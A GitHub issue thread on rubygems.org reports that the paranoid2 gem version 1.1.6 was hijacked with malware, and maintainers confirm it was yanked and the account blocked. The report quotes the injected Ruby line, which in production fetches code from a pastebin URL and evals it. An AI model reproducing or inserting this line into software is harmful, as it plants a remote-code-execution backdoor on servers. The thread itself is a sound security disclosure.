### ISSUE TITLE
paranoid2 version 1.1.6 is compromised and a malware, please yank!

### ISSUE THREAD

**Issue by lingfennan** [rubygems/rubygems.org#2051]
Hi,

[paranoid2](https://rubygems.org/gems/paranoid2) version 1.1.6 is compromised and a malware. Please remove it! The attack is  similar to the recently reported [`strong_password`](https://withatwist.dev/strong-password-rubygem-hijacked.html) and the code snippet is located at:
paranoid2-1.1.6/lib/paranoid2/persistence.rb:
```
_!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.com/raw/X9S6XQFx')))}}}if Rails.env[0]=="p"}
```

https://rubygems.org/gems/paranoid2
https://withatwist.dev/strong-password-rubygem-hijacked.html

**Comment by simi** [comment]
It looks like it aims to https://github.com/vitorgamer58/Bolsotrade-Graviex.

**Comment by simi** [comment]
also to https://www.peatio.com/

**Comment by indirect** [comment]
The compromised version has been yanked, and the account that pushed the malware has been blocked. Thanks for reporting this!
